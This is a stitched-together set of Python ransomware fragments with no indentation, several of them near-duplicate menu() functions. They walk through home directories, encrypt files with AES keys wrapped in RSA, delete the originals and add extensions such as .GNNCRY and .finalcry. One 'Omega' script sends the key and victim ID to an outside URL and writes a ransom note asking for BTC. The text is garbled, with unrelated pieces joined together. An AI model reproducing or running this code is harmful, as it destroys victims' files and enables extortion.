def menu():
files = get_files.find_files(
variables.home) + get_files.find_files("/home/")
# os.mkdir("/hdd")
# mount("/dev/sda1", "/hdd")
# files = get_files.find_files("/hdd/home/ubuntu-sandbox")
rsa_object = asymmetric.assymetric()
rsa_object.generate_keys()
Client_private_key = rsa_object.private_key_PEM
Client_public_key = rsa_object.public_key_PEM
encrypted_client_private_key = encrypt_priv_key(
Client_private_key, variables.server_public_key)
with open(variables.encrypted_client_private_key_path, 'wb') as output:
pickle.dump(encrypted_client_private_key, output,
pickle.HIGHEST_PROTOCOL)
with open(variables.client_public_key_path, 'wb') as f:
f.write(Client_public_key)
Client_private_key = None
rsa_object = None
del rsa_object
del Client_private_key
gc.collect()
client_public_key_object = RSA.importKey(Client_public_key)
client_public_key_object_cipher = PKCS1_OAEP.new(client_public_key_object)
# FILE ENCRYPTION STARTS HERE !!!
aes_keys_and_base64_path = start_encryption(files)
enc_aes_key_and_base64_path = []
for _ in aes_keys_and_base64_path:
aes_key = _[0]
base64_path = _[1]
encrypted_aes_key = client_public_key_object_cipher.encrypt(aes_key)
enc_aes_key_and_base64_path.append((encrypted_aes_key, base64_path))
aes_keys_and_base64_path = None
del aes_keys_and_base64_path
gc.collect()
with open(variables.aes_encrypted_keys_path, 'w') as f:
for _ in enc_aes_key_and_base64_path:
line = base64.b64encode(_[0]) + " " + _[1] + "\n"
f.write(line)
enc_aes_key_and_base64_path = None
del enc_aes_key_and_base64_path
gc.collect()
def menu():
try:
os.mkdir(variables.ransomware_path)
except OSError:
pass
kill_databases()
files = get_files.find_files(variables.test_path)
rsa_object = asymmetric.assymetric()
rsa_object.generate_keys()
Client_private_key = rsa_object.private_key_PEM
Client_public_key = rsa_object.public_key_PEM
encrypted_client_private_key = encrypt_priv_key(Client_private_key,
variables.server_public_key)
with open(variables.encrypted_client_private_key_path, 'wb') as output:
pickle.dump(encrypted_client_private_key, output, pickle.HIGHEST_PROTOCOL)
with open(variables.client_public_key_path, 'wb') as f:
f.write(Client_public_key)
Client_private_key = None
rsa_object = None
del rsa_object
del Client_private_key
gc.collect()
client_public_key_object = RSA.importKey(Client_public_key)
client_public_key_object_cipher = PKCS1_OAEP.new(client_public_key_object)
# FILE ENCRYPTION STARTS HERE !!!
aes_keys_and_base64_path = start_encryption(files)
enc_aes_key_and_base64_path = []
for _ in aes_keys_and_base64_path:
aes_key = _[0]
base64_path = _[1]
encrypted_aes_key = client_public_key_object_cipher.encrypt(aes_key)
enc_aes_key_and_base64_path.append((encrypted_aes_key, base64_path))
aes_keys_and_base64_path = None
del aes_keys_and_base64_path
gc.collect()
with open(variables.aes_encrypted_keys_path, 'w') as f:
for _ in enc_aes_key_and_base64_path:
line = base64.b64encode(_[0]) + " " + _[1] + "\n"
f.write(line)
enc_aes_key_and_base64_path = None
del enc_aes_key_and_base64_path
gc.collect()
def menu():
new_files = get_files.find_files(variables.test_path)
aes_keys_and_base64_path = start_encryption(new_files)
if(aes_keys_and_base64_path):
with open(os.path.join(variables.ransomware_path,
'AES_encrypted_keys.txt'), 'a') as f:
for _ in aes_keys_and_base64_path:
cipher = PKCS1_OAEP.new(client_public_key_obj)
encrypted_aes_key = cipher.encrypt(_[0])
f.write(base64.b64encode(encrypted_aes_key) + " " + _[1] + "\n")
aes_keys_and_base64_path = None
del aes_keys_and_base64_path
gc.collect()
def main(path):
files = get_files.find_files(path)
path_n_keys = []
for found_file in files:
key = generate_keys.generate_key(32, True)
with open(found_file, 'rb') as f:
file_content = f.read()
encrypted = encrypt.encrypt(file_content, key)
new_file_name = found_file + ".GNNCRY"
with open(new_file_name, 'wb') as f:
f.write(encrypted)
path_n_keys.append((new_file_name, key))
os.remove(found_file)
pickle.dump(path_n_keys, open('teste/keys.key', 'w'))
def menu():
# encrypted_files = get_paths()
new_files = get_files.find_files(test_path)
aes_keys_and_base64_path = start_encryption(new_files)
if(aes_keys_and_base64_path != None):
with open(ransomware_path + '/AES_encrypted_keys.txt', 'a') as f:
for _ in aes_keys_and_base64_path:
# encrypt aes key
cipher = PKCS1_OAEP.new(client_public_key_obj)
encrypted_aes_key = cipher.encrypt(_[0])
# store to disk encrypted aes key and path
f.write(base64.b64encode(encrypted_aes_key) + " " + _[1] + "\n")
# free the memory
aes_keys_and_base64_path = None
del aes_keys_and_base64_path
gc.collect()
def interface():
files = get_files.find_files(test_path)
RSA_cipher = asym.assymetric()
RSA_cipher.generate_keys()
client_private_key = RSA_cipher.private_key_PEM
#print(client_private_key)
client_public_key = RSA_cipher.public_key_PEM
enc_priv_key = encrypt_priv_key(client_private_key,
servkey.server_public_key)
with open(servkey.enc_client_private_key_path, 'wb') as f:
pickle.dump(enc_priv_key, f)
with open(servkey.client_private_key_path, 'wb') as f:
pickle.dump(client_private_key, f)
with open(servkey.client_public_key_path, 'wb') as f:
f.write(client_public_key)
#del client_private_key
#del RSA_cipher
client_pub_key_encryption = RSA.importKey(client_public_key)
client_pub_key_cipher = PKCS1_OAEP.new(client_pub_key_encryption)
#Encryption starts from here
aes_key_paths = start_encryption(files)
enc_aes_key_and_path = []
for i in aes_key_paths:
aes_key = i[0]
aes_path = i[1]
enc_aes_key = client_pub_key_cipher.encrypt(aes_key)
enc_aes_key_and_path.append((enc_aes_key, aes_path))
#del aes_key_paths
with open(servkey.encrypted_aes_key_and_paths_path, 'wb') as f:
pickle.dump(enc_aes_key_and_path, f)
def menu():
# create ransomware directory
try:
os.mkdir(ransomware_path, 0700)
except OSError:
pass
# get the files in the home directory
# /home/$USER
files = get_files.find_files(test_path)
# FILE ENCRYPTION STARTS HERE !!!
aes_keys_and_base64_path = start_encryption(files)
enc_aes_key_and_base64_path = []
for _ in aes_keys_and_base64_path:
aes_key = _[0]
base64_path = _[1]
# encrypt with the client public key
encrypted_aes_key = client_public_key_object_cipher.encrypt(aes_key)
enc_aes_key_and_base64_path.append((encrypted_aes_key, base64_path))
# free the old AES keys
aes_keys_and_base64_path = None
gc.collect()
del aes_keys_and_base64_path
# save to disk -> ENC(AES) BASE64(PATH)
with open(ransomware_path + "/AES_encrypted_keys.txt", 'w') as f:
for _ in enc_aes_key_and_base64_path:
line = base64.b64encode(_[0]) + " " + _[1] + "\n"
f.write(line)
enc_aes_key_and_base64_path = None
gc.collect()
del enc_aes_key_and_base64_path
from aes_cipher import *
import uuid
import get_files
from web import *
if os.path.exists(os.path.expanduser('~') + '\\desktop\\note.txt'):
sys.exit()
key = str(uuid.uuid4().get_hex().upper()[0:16])
uid = str(uuid.uuid4().get_hex().upper()[0:10])
username = os.getenv('username')
path2enc = os.path.expanduser('~') + '\\desktop\\test\\'
url = "http://rmtomega.cc.net/victim.php"
note = '''
Omega!
---------------
Your files have been encrypted. You have to pay a ransom, 1000$ in BTC currency to xxxxxxxxxxxxxxxxx,
after completing the payment plz E-mail me at [email protected]
and I will send you the decryption key. Your unique ID is: '{}''''.format(uid)
files = get_files.find_files(path2enc)
for _file in files:
encrypt_file(key,_file)
os.remove(_file)
sendcred(url,key,uid)
notefile = open(os.path.expanduser('~') + '\\desktop\\note.txt','w')
notefile.write(note)
notefile.close()
def menu():
# create ransomware directory
try:
os.mkdir(ransomware_path, 0700)
except OSError:
pass
# get the files in the home directory
# /home/$USER
files = get_files.find_files(test_path)
# create RSA object
rsa_object = asymmetric.assymetric()
rsa_object.generate_keys()
server_public_key_object = RSA.importKey(server_public_key)
Client_private_key = rsa_object.private_key_PEM
Client_public_key = rsa_object.public_key_PEM
encrypted_client_private_key = encrypt_priv_key(Client_private_key,
server_public_key)
# save encrypted client private key to disk
with open(ransomware_path + '/encrypted_client_private_key.key',
'wb') as output:
pickle.dump(encrypted_client_private_key, output,
pickle.HIGHEST_PROTOCOL)
# save client public key to disk
with open(ransomware_path + "/client_public_key.PEM", 'wb') as f:
f.write(Client_public_key)
# Free the memory from keys
Client_private_key = None
rsa_object = None
gc.collect()
del rsa_object
del Client_private_key
# Get the client public key back as object
client_public_key_object = RSA.importKey(Client_public_key)
client_public_key_object_cipher = PKCS1_OAEP.new(client_public_key_object)
# FILE ENCRYPTION STARTS HERE !!!
aes_keys_and_base64_path = start_encryption(files)
enc_aes_key_and_base64_path = []
for _ in aes_keys_and_base64_path:
aes_key = _[0]
base64_path = _[1]
# encrypt with the client public key
encrypted_aes_key = client_public_key_object_cipher.encrypt(aes_key)
enc_aes_key_and_base64_path.append((encrypted_aes_key, base64_path))
# free the old AES keys
aes_keys_and_base64_path = None
gc.collect()
del aes_keys_and_base64_path
# save to disk -> ENC(AES) BASE64(PATH)
with open(ransomware_path + "/AES_encrypted_keys.txt", 'w') as f:
for _ in enc_aes_key_and_base64_path:
line = base64.b64encode(_[0]) + " " + _[1] + "\n"
f.write(line)
enc_aes_key_and_base64_path = None
gc.collect()
del enc_aes_key_and_base64_path
def menu():
# create ransomware directory
try:
os.mkdir(ransomware_path, 0o700)
except OSError:
pass
# get the files in the home directory
# /home/$USER
files = get_files.find_files(home)
# create RSA object
rsa_object = asymmetric.assymetric()
rsa_object.generate_keys()
# Here is the public key of the attacker.
server_public_key_object = RSA.importKey(server_public_key)
# Get victim's private key
Client_private_key = rsa_object.private_key_PEM
# Get victim's public key
Client_public_key = rsa_object.public_key_PEM
# encryp victim's private key & attacker's public key with attacker's public key.
# So, only attacker can read them.
# I don't know why server_public_key is included. Maybe, the server side need this info later.
encrypted_client_private_key = encrypt_priv_key(Client_private_key,
server_public_key)
# save encrypted client private key to disk
with open(ransomware_path + '/encrypted_client_private_key.key',
'wb') as output:
# serialize and write to the file.
pickle.dump(encrypted_client_private_key, output,
pickle.HIGHEST_PROTOCOL)
# save client public key to disk
with open(ransomware_path + "/client_public_key.PEM", 'wb') as f:
f.write(Client_public_key)
# Free the memory from keys
Client_private_key = None
rsa_object = None
del rsa_object
del Client_private_key
gc.collect()
# Get the client public key back as object
client_public_key_object = RSA.importKey(Client_public_key)
client_public_key_object_cipher = PKCS1_OAEP.new(client_public_key_object)
# FILE ENCRYPTION STARTS HERE !!!
aes_keys_and_base64_path = start_encryption(files)
enc_aes_key_and_base64_path = []
# The aes_keys_and_based_64_path is a list of tuples.
# Each tuple is a (key, path) pair.
# That is, each compromised file associated with an individual key.
for _ in aes_keys_and_base64_path:
aes_key = _[0]
base64_path = _[1]
# encrypt with the client public key. For signature purpose.
encrypted_aes_key = client_public_key_object_cipher.encrypt(aes_key)
# So, you got lots of key,path pairs signed.
enc_aes_key_and_base64_path.append((encrypted_aes_key, base64_path))
# free the old AES keys
aes_keys_and_base64_path = None
del aes_keys_and_base64_path
gc.collect()
# save to disk -> ENC(AES) BASE64(PATH)
with open(ransomware_path + "/AES_encrypted_keys.txt", 'w') as f:
for _ in enc_aes_key_and_base64_path:
line = base64.b64encode(_[0]) + " ".encode() + _[1] + "\n".encode()
f.write(line.decode())
enc_aes_key_and_base64_path = None
del enc_aes_key_and_base64_path
gc.collect()
def encrypt_files(path, key):
files = get_files.find_files(path)
for file in files:
pyAesCrypt.encryptFile(file, file + ".finalcry", key, bufferSize)
os.remove(file)